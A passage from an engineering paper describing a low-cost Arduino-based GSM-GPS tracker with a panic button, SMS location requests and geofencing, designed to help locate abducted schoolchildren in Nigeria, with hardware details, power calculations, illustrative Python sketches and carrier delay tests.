alarms. Most of these functions are not adaptable to this paper’s tracker’s intended use case. 
The tracking system using GSM-GPS technology in [13] was developed to track the information of a lost child via Google Maps, and the location of the child through GPS. Its hardware components include Arduino Uno, GPS Module and a GSM Module (SIM900A). Its basic software requirement is the Open-Source Integrated Development Environment (IDE). GPS calibrates the position of the child/children, GSM sends the information to a registered guardian’s mobile number with the help of SMS, the IDE is used to ensure computed code is successfully uploaded on the physical board and Google Maps ensures the accuracy of the calibrated location. The authors point out that with further work, a high-scale deployment for child tracking can be accomplished. In [7], a handheld positioning tracker based on GPS/GSM was developed for tracking civilians and transport vehicles. The hardware circuit design consists of a STC12C5A60S2 CPU microcontroller, GPS/GSM Module and a TFT (Thin Film Transistor) LCD display. The microcontroller is able to aid in the reading of GPS location parameters and other information data. Though the system is very flexible, portable, convenient and has a stable performance, it does not consider precision in cases of individual tracking. The GPS and GSM Based Tracking system in [14] was designed for people in various conditions like fishermen, soldiers, aged people and girls, using a GPS system, a GSM modem, an ARM7 LPC2148 Microcontroller, a heartbeat sensor, an LCD display and a vibrator. The GPS system ensures the locations of lost persons are calibrated. It then passes information generated to the GSM modem which ensures it gets to the appropriate person. Furthermore, a heartbeat sensor is included to evaluate the state of the individual
being tracked (alive or dead) and a buzzer to alert someone if the tracked individual is in danger. The authors report that the system helps prevent fishermen and other vulnerable people from getting lost and, if they are lost, helps locate them. However, the system is briefcase-sized, and the authors point out that sending location data takes time when more than three predefined phone numbers are registered.

Global System for Mobile Communications (GSM) and Global Positioning System (GPS) were the key technologies employed by the tracking system in [15]. Its main objective is to identify children and track them within a region designated for them. The device is simple to operate and may be worn as a wristwatch, tucked within the child’s clothing, or attached to a belt. The tracker is triggered when the child leaves the boundaries of the designated region, and a warning message is sent to the person monitoring the child so that they are aware of the child’s new location. The tracker can also be activated by SMS, which lets the user communicate with the GSM module remotely from a mobile phone. Testing of this tracker at a school produced excellent results. The system has features that can be adapted to this paper’s use cases, and the authors indicate that it may be improved by adding other features.

The system developed in [16] is made up of an Arduino microcontroller, a GPS and GSM kit, and an alarm button. Parent and child modules were designed and linked to a web server, which functions as middleware between the two. The main purpose of the device was to find lost or missing children and to reassure their parents of their protection. The method makes use of a number of features that Android smartphones provide. A limitation of the system is the susceptibility of the middleware.

A smartphone and an Arduino Uno were used in the vehicle tracking system proposed in [17]. Arduino is cheap and simple to integrate into a system in comparison to other options. The built-in device uses GPS-GSM technology, one of the most popular methods for vehicle tracking, and employs a GSM module to transmit and receive messages from other GSM numbers. The location and name of the site are then shown on mobile devices via Google Maps. As a result, the smartphone user can track a moving car on demand and predict the distance and arrival time to a given location. The vehicle owner must first send a location request message to find out where the car is.

Finally, in [18] an “On-Board Module” for a tracking system was designed and placed in the target vehicle. Because it uses GSM and GPS technology, the system can monitor objects and offers the most recent information on active trips. Real-time traffic surveillance is where this technology is most used. An SMS message may be used to report an object’s location while it is moving. A limitation, however, is a range problem: if the car crosses a particular border, the tracker’s memory card will not operate.

2.2 Review Results

A review of works related to GSM-GPS technology was done, carefully examining the technology behind each type of electronic tracking, its associated costs, its complexity
A. Ifeoluwa and I. Francis
of implementation, its use cases as compared to the usage scope of this paper and its B2G nature. The review reinforces GPS technology as the most feasible option: it is an already deployed system that can be used by anybody, anywhere on the globe, at any time and without limitation [19]. There are no setup or subscription costs, and GPS positioning technology is mature, which widens its breadth of use and lowers the cost of a range of product development processes. The majority of portable positioning trackers on the market can only perform GPS self-positioning; GSM-GPS technology, however, combines GPS positioning with GSM wireless data transmission, resulting in low-cost real-time monitoring on the tracking side [7]. It is important that the tracker be low-cost and uncomplicated, as it is intended to be mass-produced and to primarily serve areas where guardians and parents might be unable to afford a tracker at any price. GPS works in any weather conditions, although it is sometimes limited by them. It gives the name of the street that its receiver is travelling on and, when working without interference, the exact latitude and longitude of its location. The tracker’s scope of usage tolerates this weather-related limitation, given that the exact indoor position of an abducted schoolchild does not need to be known. Information about the street or building location of the abducted is more than enough for even the most unreliable of security forces to retrieve the missing child. This is explained further in the following section, which also proposes components for the tracker based on the review carried out.
3 Methodology

In summary, the tracker’s general system requirement is to design and implement a tracking system for any private individual looking to enhance their personal security. In its consideration of children, however, the paper’s primary compulsory requirements become:

1. The system should be designed considering the inherent helplessness and vulnerability points of children. Aside from including a panic button, which children might not have the ingenuity to use, guardians should also be able to receive the location of their wards on demand and on a case-by-case basis. Interrupts sent over GSM/GPRS to a central processing unit in the form of a microcontroller can achieve this. That is, an SMS acting as an interrupt can be sent from an authorized number to request the immediate geolocation of the tracker, and the location of the tracker can also be reported when it leaves a predefined location.

2. The system should also be designed to accommodate its social justice and B2G mass production theme by considering the following:

i. Minimized complexity and ease of implementation of the technology: Since the paper’s primary objective also includes possible mass production and contracting by the government or NGOs to solve the problem of abduction of vulnerable school children in Nigeria, ease of implementation and minimized complexity of design are essential. GPS technology as the primary tracking technology has
been established to fulfil this system requirement by the review carried out in the previous section.

ii. Cost-effectiveness for vulnerable school children in Nigeria: The children in Nigeria most affected by and prone to abduction live in areas of extreme poverty, so the cost-effectiveness of the tracker has to be considered. A low cost makes it feasible for guardians to purchase the tracker, or for non-governmental bodies or the government itself to purchase large numbers for distribution.

iii. Reasonable level of precision: Extreme sophistication, such as pinpointing the exact location of a child indoors, is not required. Only a reasonable level of precision, in the form of a calibrated building location or street name, is needed for even the most inefficient of security forces to launch a rescue operation. This also aids the cost-effectiveness discussed previously.

iv. Ease of usage: Parents or guardians of any literacy level should be able to properly use and configure the tracking system’s interfaces and know how to use the tracking system in an actual emergency or, in cases of extreme illiteracy, solicit the help of the nearest averagely literate individual who can retrieve the information and then notify the authorities.

v. Concealable: The tracking system should be as concealable as cost constraints allow, in order to avoid detection by abductors or kidnappers.

vi. Prolonged system operation: The system has to sustain itself for a long period of time, as its scope of usage covers the entire estimated eight-hour duration when children are away from their guardians at school. This means its power source has to be long-lasting.
To that end, the proposed components for this paper, based on the analysis of these requirements as well as the comparative review in Sect. 2, are enumerated in the subsection below.

3.1 Hardware Components

The chosen hardware components for this tracker are made up of the following units:

I. Input Unit
II. Communication Unit
III. Power Supply Unit
IV. Control Unit (Central Processing Unit)

These units are interconnected as depicted in Fig. 1.
Input Unit. This unit is made up of a panic push button which, when pressed, causes the system to send an emergency location-bearing SMS in the form of a Google Maps link to the person whose phone number is registered in the system. Input can also arrive as a location request interrupt, raised in the microcontroller by a location-request SMS from the registered phone number, or be triggered when the tracker moves beyond a pre-set location.
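The “pre-set location” trigger can be read as a geofence check. The sketch below is a host-side Python illustration rather than the authors’ firmware, which the paper says was written in C++ in the Arduino IDE. It assumes the pre-set location is a centre point with a circular radius and uses the haversine great-circle distance. The function names are hypothetical, and the 50 m default simply mirrors the distance used in the test described in Sect. 4.2.

```python
import math

EARTH_RADIUS_M = 6_371_000.0  # mean Earth radius in metres


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two points given in degrees."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlmb = math.radians(lon2 - lon1)
    a = (math.sin(dphi / 2) ** 2
         + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2)
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def outside_geofence(lat, lon, centre_lat, centre_lon, radius_m=50.0):
    """True when the fix lies farther than radius_m from the fence centre."""
    return haversine_m(lat, lon, centre_lat, centre_lon) > radius_m
```

With a made-up centre at (6.670, 3.158), a fix 0.001 degrees of latitude further north is roughly 111 m away and would raise the trigger, while a fix 0.0001 degrees away (about 11 m) would not.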
Fig. 1. Block diagram of the system
Fig. 2. Panic push button [20].
Figure 2 is a pictorial representation of the panic button, which functions as an input to the system.

Communication Unit. This unit comprises the SIM800L GSM module and the NEO-6m GPS module. The GPS module obtains the latitude and longitude of the tracker, while the GSM module sends the emergency location-bearing SMS to the person whose phone number is registered in the system.
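GPS receivers of this kind typically report position as NMEA 0183 sentences, in which latitude and longitude appear as degrees and decimal minutes (ddmm.mmmm or dddmm.mmmm) followed by a hemisphere letter. The paper does not describe how its firmware reads the module, so the following Python sketch is only an assumption about that step: it converts one such field to signed decimal degrees. The function name is hypothetical, and well-formed fields are assumed.

```python
def nmea_to_decimal(value: str, hemisphere: str) -> float:
    """Convert an NMEA (d)ddmm.mmmm field to signed decimal degrees.

    The two digits before the decimal point, plus the fraction, are minutes;
    everything before them is whole degrees. South and west are negative.
    """
    dot = value.index(".")
    degrees = int(value[:dot - 2])
    minutes = float(value[dot - 2:])
    decimal = degrees + minutes / 60.0
    return -decimal if hemisphere in ("S", "W") else decimal
```

For example, the field pair `4807.038`, `N` means 48 degrees and 7.038 minutes north, which is 48.1173 in decimal degrees.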
Fig. 3. SIM800L GSM module [21]
Figures 3 and 4 are pictorial representations of the SIM800L GSM Module and NEO-6m GPS Module respectively. The module containing the SIM links the user and the tracking system. It communicates serially with the Arduino and connects wirelessly to the user through the mobile network. The module in the tracking system is connected to the Arduino through the
Fig. 4. NEO-6m GPS module [22].
transmitter (TX) and receiver (RX) pins. The GSM and GPS modules work together and are attached to the Arduino board, obeying the instructions that come from the microcontroller. The GSM module connects to a mobile network through a SIM card and sends the location-based SMS when the panic button is pressed, when the tracker moves beyond its pre-set location and/or when the registered number makes a request to the system via SMS.

Control Unit (Central Processing Unit). Arduino technology was chosen for the control unit of this system. Arduino boards are commonly employed in microcontroller programming. An Arduino board is a circuit layout containing a chip that can be instructed to carry out a sequence of commands. Instructions written in software on a computer are loaded onto the Arduino microcontroller, which then drives the appropriate circuit, or a machine with numerous circuits, to carry out the request.

Arduino Nano. The Arduino Nano’s ATmega328 microcontroller is identical to the one in the more widely used Arduino Uno. The board has two 22 picofarad ceramic capacitors, a reset button and a 16 MHz crystal oscillator. Its small size and versatility allow it to be employed in a number of circumstances. The board has twenty-two input/output pins, eight analogue and fourteen digital, and an operating voltage of 5 V. It also has a USB connection for uploading and supports a range of communication protocols, including serial, I2C, and SPI (Serial Peripheral Interface). To give USB power and communication to the board, the six-pin header can be connected to an FTDI (Future Technology Devices International Limited) cable or SparkFun breakout board. This board was designed for semi-permanent installations. It permits direct soldering of wires and the use of many kinds of connectors since it comes with headers that are not yet mounted. SparkFun Electronics manufactured this Arduino Nano board.
Figure 5 is a pictorial representation of the Arduino Nano microcontroller board, which is the brain behind the tracking system. The control unit is made up of this Arduino Nano board, which was programmed in the C++ programming language in the Arduino integrated development environment (IDE). The ATmega328 on the Arduino Nano contains 32 kilobytes of flash memory, of which 2 kilobytes are used by the bootloader. The SRAM is 2 kilobytes in size, while the EEPROM is 1 kilobyte in size. Figure 6 is a pictorial representation of the circuitry of the control unit.
Fig. 5. Arduino Nano microcontroller [23].
Fig. 6. Circuitry representation of the Arduino nano control unit [24].
Power Supply Unit. The TP4056 battery charger, a switch, a 3.7 V battery and the MT3608 voltage boost converter constitute the power supply unit. A charging circuit operating at 3.7 V–4.2 V is designed to charge the system. This power module is significant because it governs the total power the system distributes and uses; all other subsystems are connected to it for power. The charge controller monitors the battery’s voltage and, when the battery is full, shuts down the circuit, which stops the charging process. The charge controller must function as intended for the device to work efficiently. The system is powered by a rechargeable 3.7 V 3800 mAh battery. The switch either connects or breaks the circuit so that the system only functions when turned on, which conserves power. The MT3608 boosts the voltage from 3.7 V to 12 V, which is then supplied to the Arduino board’s Vin pin. The inbuilt voltage regulator on the Arduino board steps 12 V down to 5 V, which powers the Arduino board, LCD, and SIM800L GSM module.
The device’s power consumption is estimated by multiplying its total current by its supply voltage. The loads considered here run from a 5 V supply, which provides the power needed to handle the system’s load.

Calculations:

Operating current at standby: $I_{\text{standby}} = 45\ \text{mA}$ (3.1)

Arduino board operating voltage: $V = 5\ \text{V}$ (3.2)

Power rating at standby: $P_{\text{standby}} = 5\ \text{V} \times 45\ \text{mA} = 0.225\ \text{W}$ (3.3)

The DC current in each I/O pin is 20 mA. Supposing 10 I/O pins are used, the total current used by the I/O pins is $I_{\text{I/O}} = 20\ \text{mA} \times 10 = 200\ \text{mA}$ (3.4)

Therefore, the power used by the I/O pins is $P_{\text{I/O}} = 5\ \text{V} \times 0.2\ \text{A} = 1\ \text{W}$, and the total power is $P_{\text{total}} = 1\ \text{W} + 0.225\ \text{W} = 1.225\ \text{W}$ (3.5)

$P(\text{W}) = IV$ (3.6)
where I = total current and V = total voltage.

Table 1. Summary of hardware component units

S/N  Unit                Component information
1    Input unit          a) Panic button; b) GPS module; c) 5 V input voltage; d) ATmega328 microcontroller chip
2    Communication unit  GSM module
3    Control unit        Arduino Nano
4    Power unit          a) 3.7 V Li-Po battery; b) TP4056 Li-Po battery charger; c) MT3608 voltage boost converter
Table 1 gives a compact representation of all units and their respective constituting components.
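The power figures in the calculations above can be combined with the stated 3.7 V, 3800 mAh battery to give a rough runtime estimate for comparison with the eight-hour requirement. The Python sketch below is illustrative only. The 85% conversion efficiency is an assumed value, not one from the paper, and the estimate covers only the loads the paper itemises (standby plus ten I/O pins), not the transmit bursts of the GSM module.

```python
def power_w(voltage_v, current_a):
    """P = I * V, in watts."""
    return voltage_v * current_a


# Figures taken from the paper's calculation.
standby_w = power_w(5.0, 0.045)        # standby draw at 5 V
io_w = power_w(5.0, 10 * 0.020)        # ten I/O pins at 20 mA each
total_w = standby_w + io_w             # total load considered


def runtime_hours(capacity_mah, battery_v, load_w, efficiency):
    """Battery energy (Wh), derated by converter efficiency, divided by load."""
    energy_wh = capacity_mah / 1000.0 * battery_v
    return energy_wh * efficiency / load_w


# ASSUMPTION: 0.85 is a hypothetical overall boost/regulator efficiency.
estimate_h = runtime_hours(3800, 3.7, total_w, efficiency=0.85)
```

Under these assumptions the battery stores about 14.06 Wh and the estimate comes to roughly 9.8 hours, which would only narrowly clear an eight-hour school day; a measured current profile would be needed to confirm it.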
3.2 Software Components

The Arduino board in the system was programmed in the C++ programming language in the Arduino integrated development environment (IDE). The Arduino IDE software is used to configure the Arduino Nano microcontroller, the GPS module and the SIM800L module so that location data obtained from the GPS satellites is delivered, as a Google Maps link, to the mobile number registered to receive it.

3.3 System Flowchart

As can be seen in Fig. 7, all modules are started and initialized at the beginning of the program. The system then continually checks whether the panic button has been pressed, whether a location request message has been sent by an authorized user and/or whether the tracker has moved beyond its pre-set location. If none of these has happened, it continues to check and to store the most recent location data until the system is turned off. If any of the checks returns a positive response, it locates the user using the GPS module, sends the location SMS to the registered number and reinitializes after five minutes, beginning the entire process again until the system is turned off.
Fig. 7. Tracker’s flowchart.
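The decision logic of the flowchart can be sketched as a small polling function. This is one possible reading of the flow, written in Python for illustration and not taken from the authors’ C++ firmware: the three triggers are checked on every pass, and after a report the tracker stays quiet for five minutes before checking again. The names `TrackerState` and `poll`, and the priority order among simultaneous triggers, are assumptions.

```python
from dataclasses import dataclass
from typing import Optional

REPORT_INTERVAL_S = 5 * 60  # the paper states a five-minute reinitialisation


@dataclass
class TrackerState:
    last_report_s: Optional[float] = None  # time of the last SMS, if any


def poll(state: TrackerState, now_s: float, panic_pressed: bool,
         request_received: bool, outside_fence: bool) -> Optional[str]:
    """Return the reason a location SMS should be sent now, or None."""
    waiting = (state.last_report_s is not None
               and now_s - state.last_report_s < REPORT_INTERVAL_S)
    if waiting:
        return None  # still inside the wait that follows a report
    if panic_pressed:
        reason = "panic"
    elif request_received:
        reason = "request"
    elif outside_fence:
        reason = "geofence"
    else:
        return None  # nothing to report; keep checking
    state.last_report_s = now_s
    return reason
```

A tracker that stays outside its pre-set area would, under this sketch, report once and then again every five minutes, which matches the repeated messages described for the test run.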
4 Result and Discussion

The tracker is controlled by a microcontroller. The Arduino is connected to every component of the device, and each hardware component is connected to its allocated Arduino pin with its own function.

4.1 Circuit Diagram
Fig. 8. Tracker’s circuit diagram.
As seen in Fig. 8, a software serial connection links the GSM module to the Nano board. Its receive pin (Rx) is linked to digital pin 3 of the Nano board (D3) and its transmit pin (Tx) is linked to digital pin 2 (D2). The GSM module is wired to be powered directly by the 3.7 V Li-Po battery. The GPS module (NEO-6m) is also connected via a software serial connection. The module’s Rx pin is linked to the Nano’s digital pin 11 (D11) and its Tx pin is linked to digital pin 10 (D10). The 5 V power supply rails are connected in parallel to the Nano’s power rails. The Li-Po battery is connected to a charging module with a 3.7–4.2 V output voltage range. It was modified to output 5 V by adjusting the variable resistor on board the module. While the GSM module is powered by the 3.7 V battery, a two-pole switch isolates power from the modules that are not in use, which enhances the overall design. A computer program was written in C++ using the Arduino IDE to control the circuit. The Arduino has a serial port through which its programming circuit is connected to the computer’s serial port, allowing code to be loaded into the Nano’s memory. The code configures the appropriate pins to connect the various I/O systems to the microcontroller.

Tracker Schematic. The developed GSM-GPS tracking system is shown in Fig. 9. The ‘toggle on/off button’, in the form of a red switch, is visible, and the panic button is on the other side.
Fig. 9. Completed GSM-GPS based tracking system.
The SIM slot is located to the right of the ‘toggle on/off switch’, and an indicator showing that the system has been powered on and/or is charging is located to its left. Below the switch is a USB charging port for charging the tracker’s battery, and on the right side of the body of the tracker is the port for accessing the microcontroller and configuring it in the Arduino IDE. The tracker’s dimensions are 15 cm × 8 cm × 5 cm, and it can be concealed in pencil cases, bag straps and textbooks.
4.2 System Operation

After assembling both hardware and software, the following system functionality was achieved in the following sequence of steps.

Step 1 (Turning on the tracker): Once the red button on the device, seen in Fig. 9, is toggled from off to on, all modules are started and initialised, beginning the program. Upon initialization the system activates the GSM module, which starts operating.

Step 2 (Searching for network): Once initialized with a SIM correctly inserted in the tracker, the GSM module looks for network support. The GSM module’s LED flashes about six times every second at first, then once every three seconds after it detects network support. In the absence of a good signal, the LED flashes every second and an error occurs, leading to communication inefficiency until the tracker comes within range of a good signal.

Step 3 (System establishes network connection): If the connection is established, the GPS module initializes, the serial port becomes available for communication, and the GSM module enables SMS transmission and communication with the Arduino via the panic button input and location request interrupt SMS messages.

Step 4 (Tracked individual presses the panic button, exceeds the pre-set location and/or a location request is made by a registered number): The system reads and stores current location data and continually checks whether the panic button is pressed, whether the pre-set location has been exceeded and/or whether a location request message has been sent by an authorised user. If none of these has happened, it continues to store location data and check until the system is turned off. If any of the checks returns a positive response, it sends the most recent location data via SMS to the registered number in the form of a Google Maps link. It
then reinitializes after five minutes and reinitiates the process from Step 1 until stopped or turned off.
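The message sent in Step 4 can be sketched in two parts: building a Google Maps link from the stored coordinates, and the text-mode AT command sequence a GSM modem such as the SIM800L accepts for sending an SMS. The paper does not give its link format or firmware, so this Python sketch is an assumption on both counts. The link follows Google’s documented Maps URLs search form, the AT commands are the standard `AT+CMGF` and `AT+CMGS`, and the function names and phone number are hypothetical.

```python
def maps_link(lat: float, lon: float) -> str:
    """Google Maps search URL for a coordinate pair (comma URL-encoded as %2C)."""
    return ("https://www.google.com/maps/search/?api=1"
            f"&query={lat:.6f}%2C{lon:.6f}")


def sms_at_sequence(number: str, text: str) -> list:
    """Strings to write to the modem's serial port, in order.

    AT+CMGF=1 selects text mode; AT+CMGS starts a message to `number`;
    the body is terminated with Ctrl+Z (0x1A). A real sender must wait for
    the modem's reply after each step, including the '>' prompt before the body.
    """
    return [
        "AT+CMGF=1\r",
        f'AT+CMGS="{number}"\r',
        text + "\x1a",
    ]


# Hypothetical registered number and coordinates, for illustration only.
commands = sms_at_sequence("+2340000000000", maps_link(6.67, 3.158))
```

Keeping the link construction separate from the modem commands makes each piece easy to check on a desktop before porting the same logic to the microcontroller.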
Fig. 10. (a) and (b). Screenshots of the functionality of the tracker.
Screenshots of the functionality of the GSM-GPS based tracker are provided in Fig. 10(a) and (b). In both uses, the tracker is located at the Lecture Theatre at Covenant University, Ota, Ogun State and the holder of the registered mobile number at Dorcas Hall, Covenant University, Ota, Ogun State. Its pre-set location was also Dorcas Hall. Figure 10(a) shows an emergency message received by the holder of the registered phone number once the tracker first moves more than 50 m from Dorcas Hall, followed by further messages every five minutes as the tracker reinitializes and meets the same condition. One emergency message is also sent when the tracker’s panic button is pushed. In Fig. 10(b), the holder of the registered mobile number sends a location request to the tracker three times, and it responds each time with the tracker’s location. In both test runs the location is sent as a Google Maps link, as can be seen in the figures, which takes the holder of the registered phone number to the tracker’s calibrated position as seen in Fig. 11. This position was accurate to two metres, giving the building location but not the exact room the tracker was in. Testing was also carried out in three separate locations, with similar results in all.

4.3 Performance Tests

While testing the overall system, a pattern of delay was observed in the SMS transmission of the tracker’s location, depending on the carrier being used. Since this location should be received as quickly as possible, especially if the individual being tracked is in an extremely time-sensitive emergency, the fastest carrier response was sought out by testing a number of the different carriers
Fig. 11. Tracker’s location sent and seen via Google maps.
available. In real-life usage, however, the combination of the SIM card in the GSM module and the carrier of the registered number could always affect delay. The location of testing and the location of eventual use could also influence delay, as carrier strength varies by location depending on network technology, cell infrastructure and the number of users in the area. This lag analysis was carried out only to identify the carrier with the best chance of reduced overall delay for use in the GSM module, since the carrier of the registered number that receives and requests location messages cannot be controlled. SIM cards from four carriers (Airtel, Glo, MTN and 9mobile) were used, and Table 2 shows the results of the performance tests.

Table 2. Summary of all GSM module carriers tested against varying mobile carrier recipients (delays in seconds)

Registered mobile no.   Airtel GSM module   Glo GSM module   MTN GSM module   9mobile GSM module
Airtel                  55                  105              102              114
Glo                     102                 95               110              121
MTN                     89                  110              62               119
9mobile                 92                  121              98               87
Table 2 depicts a summary of the performance analysis of the different GSM module and registered mobile number combinations. It is also pictorially represented in Figs. 12 and 13 for easier analysis.
Fig. 12. GSM module carriers tested against varying mobile carrier recipients
As depicted in Fig. 13, which displays the average delay with respect to the carrier in the GSM module, the carrier with the best chance of a lower transmission delay, regardless of the carrier used by the registered phone number, is Airtel. This carrier was employed in the tracker prototype built. It was also observed that using the same carrier at both ends of this carrier-to-carrier transmission reduced transmission delays significantly, with Airtel-to-Airtel transmission having the lowest delay overall. In this way, since the carrier of the registered mobile number cannot be controlled, the trackers could be manufactured to allow for varying carriers and then marketed as best purchased with the tracker’s carrier matching that of the number to be registered. For example, when a user wants to purchase this tracker for themselves or for loved ones, most particularly the vulnerable Nigerian schoolchild, the best carrier to choose is the one matching the mobile number of the guardian registered to receive the tracker’s location and send location request SMS messages.
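The averages behind this comparison can be recomputed directly from the values in Table 2. The Python sketch below is only a check of that arithmetic, with hypothetical function names: it averages each GSM module carrier over the four recipient carriers and compares same-carrier pairs with cross-carrier pairs.

```python
# Delays in seconds from Table 2. Outer key: carrier of the registered number;
# inner key: carrier of the SIM in the GSM module.
DELAY_S = {
    "Airtel":  {"Airtel": 55,  "Glo": 105, "MTN": 102, "9mobile": 114},
    "Glo":     {"Airtel": 102, "Glo": 95,  "MTN": 110, "9mobile": 121},
    "MTN":     {"Airtel": 89,  "Glo": 110, "MTN": 62,  "9mobile": 119},
    "9mobile": {"Airtel": 92,  "Glo": 121, "MTN": 98,  "9mobile": 87},
}


def module_average(module_carrier: str) -> float:
    """Mean delay for one GSM module carrier across all recipient carriers."""
    values = [row[module_carrier] for row in DELAY_S.values()]
    return sum(values) / len(values)


def same_and_cross_average():
    """Mean delay for matching carrier pairs and for non-matching pairs."""
    same = [DELAY_S[c][c] for c in DELAY_S]
    cross = [DELAY_S[r][m] for r in DELAY_S for m in DELAY_S[r] if r != m]
    return sum(same) / len(same), sum(cross) / len(cross)


best_module = min(DELAY_S, key=module_average)
```

The per-module averages come to 84.5 s for Airtel, 107.75 s for Glo, 93.0 s for MTN and 110.25 s for 9mobile, and matching carriers average 74.75 s against about 106.9 s for mixed pairs, consistent with both observations in the text.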
Fig. 13. Delay average taken with respect to carriers in GSM module.
5 Future Scope and Conclusion

The scope for further work is covered by the recommendations given below.

1. Though the Federal Republic of Nigeria can be considered sufficiently technologically advanced to have basic network infrastructure and connectivity across all thirty-six states, even the most advanced nations have blind spots with very poor GSM cellular signal or none at all. GSM-GPS technology is very dependent on network signal and cannot afford to fail because of low signal. A low signal strength interrupt can be programmed within the microcontroller to automatically send the last known location of the tracked individual to the registered mobile number once the microcontroller detects that the signal strength is dropping or is below a certain threshold.

2. The interface of the tracker is not as user-friendly as it could be due to some constraints. There is currently no interface for registering the number the location messages are sent to, other than directly editing the number in the Arduino IDE.

i. A software or web application could be built to improve its interface with users. The Google Maps API could also be used to improve this interface. It is a Google technology that allows Google Maps to be embedded in applications or software. It is available for free online if monthly usage does not exceed a certain amount, allows for the adding of relevant material that
users of the site will find valuable and allows the appearance and feel of the map to be customised to match the design or scope of usage of the site. For instance, for a parent with multiple children, multiple trackers could be assigned to one number for visible monitoring of their locations at school or anywhere else at any time, with location-bearing SMS messages needed only in emergencies, when a child exceeds the pre-set location and/or presses the panic button. However, this is only a more sophisticated version of the existing tracker. The registered phone number could also be configured by SMS to maintain this paper’s cost-friendly objective.

ii. Multiple numbers could also be registered for one tracker in case the holder of one registered number is busy during an emergency. After all, the tracker does not fulfil its purpose if a message is sent in an emergency and the holder of the registered number does not see it in time.

Because the primary significance and motivation of the study is decreasing the vulnerability of school children in Nigeria, especially in poverty-affected areas like northern Nigeria, a B2G theme was chosen. It is recommended that this tracker be proposed to the government, NGOs or other relevant bodies for contracting, financing and mass production. Workmanship, other excesses and profit could be fully compensated in this process. It could also still be treated as a commercial venture for those in areas of high insecurity that are not poverty-affected, or for individuals who can afford it.

In conclusion, GSM-GPS based tracking technology has been reviewed, and a tracking system incorporating that technology has been designed to locate any individual or thing, with its design taking into account children’s unique vulnerability points.
It should be noted that this paper is a proof of concept that can still be significantly improved upon, as summarised in the recommendations above. There is more that can be done to secure the future of Nigeria in its children, but where the government has not yet begun to take the initiative, the industry can and should take steps toward that starting point.
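As an illustration of the first recommendation, GSM modems report signal quality in reply to the standard `AT+CSQ` command as `+CSQ: <rssi>,<ber>`, where an rssi of 0 to 31 maps to -113 dBm up to -51 dBm in 2 dB steps and 99 means unknown. The Python sketch below shows how a low-signal check might be built on that reply. It is a suggestion for future work rather than part of the existing tracker, and the function names and the -100 dBm threshold are hypothetical.

```python
import re
from typing import Optional


def csq_to_dbm(response: str) -> Optional[int]:
    """Extract signal strength in dBm from a '+CSQ: rssi,ber' modem reply.

    Returns None when the reply is malformed or the modem reports 99 (unknown).
    """
    match = re.search(r"\+CSQ:\s*(\d+),(\d+)", response)
    if match is None:
        return None
    rssi = int(match.group(1))
    if rssi > 31:
        return None
    return -113 + 2 * rssi


def signal_is_low(response: str, threshold_dbm: int = -100) -> bool:
    """Treat an unknown reading as low so the last location is still sent."""
    dbm = csq_to_dbm(response)
    return dbm is None or dbm <= threshold_dbm
```

Treating an unreadable or unknown signal level as low is a deliberate choice here, so that the last known location would be sent while a message can still get through.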
References

1. Verjee, A., Kwaja, C.M.A.: An epidemic of kidnapping: interpreting school abductions and insecurity in Nigeria. Afr. Stud. Q. 20(3), 87–105 (2021)
2. Madubuegwu, C.E., Obiorah, C.B., Okechukwu, G.P., Emeka, O., Ibekaku, U.K.: Crises of Abduction of School Children in Nigeria: Implications and Policy Interventions, vol. 5, no. 7, pp. 48–57 (2021)
3. Nwagboso, C.I.: Nigeria and the challenges of internal security in the 21st century. Eur. J. Interdisc. Stud. 4, 15 (2018). https://doi.org/10.26417/ejis.v4i2a.p15-33
4. Faulkner, J.: The Importance of Being Innocent: Why we Worry About Children. Cambridge University Press, Cambridge (2010)
5. Ipingbemi, O., Aiworo, A.B.: Journey to school, safety and security of school children in Benin City, Nigeria. Transp. Res. Part F: Traffic Psychol. Behav. 19(2013), 77–84 (2013). https://doi.org/10.1016/j.trf.2013.03.004
6. Ajala, A.T., Kilaso, B.: Safety and security consideration of school pupils in the neighbourhood. FUTY J. Environ. 13(2), 38–48 (2019)
7. Ge, X., Gu, R., Lang, Y., Ding, Y.: Design of handheld positioning tracker based on GPS/GSM. In: Proceedings of 2017 IEEE 3rd Information Technology and Mechatronics Engineering Conference, ITOEC 2017, vol. 2017-Janua, pp. 868–871 (2017). https://doi.org/10.1109/ITOEC.2017.8122477
8. Hong, L.: Child Tracking System (2016)
9. Singh, M.: Real time vehicle tracking system using GSM and GPS technology-an anti-theft tracking system (2017)
10. Maruthi, R.: SMS based bus tracking system using open source technologies. Int. J. Comput. Appl. 86(9), 44–46 (2014)
11. Lau, E.C.: Simple bus tracking system, vol. 3, no. 1, pp. 60–70 (2013)
12. Sankpal, A., Kadam, N.: Land vehicle tracking system, vol. 4, no. 3, pp. 2013–2016 (2015)
13. Patel, P., Rauniyar, S.K., Singh, T., Dwivedi, B., Tripathi, P.H.: Arduino based child tracking system using GPS and GSM. Int. Res. J. Eng. Technol. (IRJET) 5(3), 4137–4140 (2018)
14. Varsha, S., Vimala, P., Supritha, B.S., Ranjitha, V.D.: GPS and GSM-based tracking system for fisher man, soldiers, aged people and girls, vol. 4, no. 6, pp. 141–145 (2019)
15. Khutar, D.Z., Yahya, O.H., Alrikabi, H.T.S.: Design and implementation of a smart system for school children tracking. In: IOP
16. Ahire, A., Domb, P., More, M., Pednekar, P., Deshmukh, A.: Child tracking system using Arduino & GPS-GSM Kit. Int. J. Recent Innov. Trends Comput. Commun. 6, 55–56 (2018)
17. Hlaing, N.N.S., Naing, M., Naing, S.S.: GPS and GSM based vehicle tracking system. Int. J. Trend Sci. Res. Dev. 3(4), 271–275 (2019). https://doi.org/10.31142/ijtsrd23718
18. Kaur, D.S.S.: Overview on GPS-GSM technologies used in vehicle tracking. Int. J. IT Knowl. Manag. (IJITKM) 8(1), 36–38 (2015). http://searchmobilecomputing.techtarget.com/definition/
19. Rauf, F., Subramaniam, G., Adnan, Z.: Child tracking system. Int. J. Comput. Appl. 181(3), 1–4 (2018). https://doi.org/10.5120/ijca2018917071
20. Parts of A Circuit: Push Button | STEM Extreme. https://stemextreme.com/2021/01/21/parts-of-a-circuit-push-button/. Accessed 23 June 2022
21. SIM800L-GSM Module. https://nanopowerbd.com/index.php?route=product/product&product_id=141. Accessed 23 June 2022
